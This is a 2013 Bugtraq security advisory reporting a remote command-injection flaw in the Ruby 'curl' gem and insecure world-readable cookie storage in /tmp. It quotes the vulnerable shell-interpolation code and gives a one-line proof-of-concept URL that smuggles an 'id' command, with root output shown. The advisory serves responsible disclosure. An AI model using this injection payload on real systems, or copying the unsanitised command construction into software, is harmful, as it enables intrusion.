[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201303151409.r2FE9SYh006476@sf01web2.securityfocus.com>
Date: Fri, 15 Mar 2013 14:09:28 GMT
From: Larry0@...com
To: bugtraq@...urityfocus.com
Subject: Curl Ruby Gem Remote command execution
Curl Ruby Gem Remote command execution
3/12/2013
https://github.com/tg0/curl
Specially crafted URLs can result in remote code execution:
In ./lib/curl.rb the following lines:
131 cmd = "curl #{cookies_store} #{browser_type} #{@...up_params} {ref} \"{url}\" "
132 if @debug
133 puts cmd.red
134 end
135 result = open_pipe(cmd)
PoC
page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"")
larry@...erfl0w:/tmp$ cat p
uid=0(root) gid=0(root) groups=0(root)
Larry W. Cashdollar
@_larry0
http://vapid.dhs.org
This gem also stores cookie data insecurely in /tmp:
root@...erfl0w:/tmp# ls -ld curl
drwxr-xr-x 2 root root 4096 Mar 12 18:35 curl
root@...erfl0w:/tmp# ls -ld /tmp/curl
drwxr-xr-x 2 root root 4096 Mar 12 18:35 /tmp/curl
root@...erfl0w:/tmp# ls -la curl/curl_0.*
-rw-r--r-- 1 root root 428 Mar 12 18:44 curl/curl_0.287351232063069_0.217269869500322.jar
-rw-r--r-- 1 root root 428 Mar 12 18:25 curl/curl_0.564885403765839_0.0415036222928075.jar
root@...erfl0w:/tmp# cat /tmp/curl/curl_0.*
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.
.google.com TRUE / FALSE 1426199640 PREF ID=c637a1a53176d2bd:FF=0:TM=1363127640:LM=1363127640:S=XG_kBQswSvKUKY5m
#HttpOnly_.google.com TRUE / FALSE 1378938840 NID 67=kOUx2FhV6OQ6MSybmqD5vZMSI3gH8jB22AC4ReeIoqZHbao8zkejJncER8YznFgSVes6_MfqBJpgyPdR1snw3POtLL1Nr96RsQqHcdv6v6rkSmj_Z2XmVakZ95Rt1wMC
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.
.google.com TRUE / FALSE 1426198990 PREF ID=ca381d47b3f5aec2:FF=0:TM=1363126990:LM=1363126990:S=HrBfHkxDYMih4kfC
#HttpOnly_.google.com TRUE / FALSE 1378938190 NID 67=ozR4v4tBjG9kUmFshdYLu7h0Z_fyXBpTrABHtlJYbEpkB1czXMKEGa_S5t3rMBbunYIeEaguy3l1fOkfWqFni_ajjxipoyNK4taRefp977i7yV_xc4GIEtP-OQuRCydF
root@...erfl0w:/tmp#
Powered by blists - more mailing lists